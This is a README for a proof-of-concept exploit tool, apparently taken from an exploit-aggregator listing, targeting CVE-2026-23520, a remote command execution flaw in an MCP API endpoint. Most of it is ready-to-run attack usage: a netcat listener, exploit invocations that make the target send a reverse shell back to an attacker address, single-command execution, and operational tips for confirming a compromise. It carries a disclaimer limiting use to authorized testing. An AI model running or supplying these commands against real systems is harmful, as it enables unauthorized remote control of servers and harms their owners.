Share
## https://sploitus.com/exploit?id=FE59243C-F05E-52AF-BDF1-06E0D3936CE4
# CVE-2026-23520
## MCP API Remote Command Execution (RCE) Proof-of-Concept
---
## ๐ Overview
This repository provides a Proof-of-Concept (PoC) exploit for a Remote Command Execution (RCE) vulnerability affecting applications that expose a vulnerable MCP API endpoint (commonly `/api/mcp/connect`).
The issue allows an attacker to supply a crafted JSON payload that results in arbitrary command execution on the target system.
This tool is intended for **authorized security testing and research purposes only**.
---
## โ๏ธ Capabilities
* Reverse shell execution
* Arbitrary command execution
* Supports HTTP and HTTPS targets
* Accepts IP address, domain, or full URL
* Customizable endpoint path
* Verbose/debug mode for inspection
---
## ๐ Quick Start (Reverse Shell)
Start a listener on your machine:
```bash
nc -lvnp 6666
```
Execute the exploit:
```bash
python3 exploit.py target.com --lhost --lport 6666
```
If the target is vulnerable, a shell should connect back to your listener.
---
## ๐ป Command Execution Mode
To execute a single command instead of spawning a shell:
```bash
python3 exploit.py target.com --cmd "id"
```
---
## ๐ฅ Usage
```bash
python3 exploit.py [options]
```
---
## ๐ Required Input
| Parameter | Description |
| --------- | ------------------------------ |
| target | Target IP, domain, or full URL |
---
## โ ๏ธ Execution Mode (Choose One)
| Option | Description |
| ----------------- | ------------------------- |
| --lhost + --lport | Establish a reverse shell |
| --cmd | Execute a single command |
---
## ๐ง Optional Parameters
| Flag | Description |
| -------------- | ---------------------------------------- |
| -p, --port | Target port (default: 443) |
| -s, --scheme | Protocol: http or https (default: https) |
| -e, --endpoint | Vulnerable endpoint path |
| -t, --timeout | Request timeout (seconds) |
| -v, --verbose | Enable debug output |
---
## ๐งช Examples
### Reverse Shell
```bash
python3 exploit.py target.com --lhost 10.10.14.15 --lport 6666
```
### HTTP Target
```bash
python3 exploit.py target.com -s http -p 80 --lhost 10.10.14.15 --lport 4444
```
### Custom Endpoint
```bash
python3 exploit.py target.com -e /v1/connect --lhost 10.10.14.15 --lport 9001
```
### Execute Command
```bash
python3 exploit.py target.com --cmd "whoami"
```
---
## ๐ง Operational Notes
* A lack of HTTP response (timeout) does **not** indicate failure.
In many cases, successful exploitation may cause the server to stop responding while executing the payload.
* Always monitor your listener or other out-of-band channels.
* The reverse shell payload assumes `/bin/bash` is available on the target system.
---
## โ ๏ธ Disclaimer
This tool is provided for **educational purposes and authorized security assessments only**.
Unauthorized use against systems you do not own or have permission to test is illegal.
---
## ๐จโ๐ป Author
Parosh B.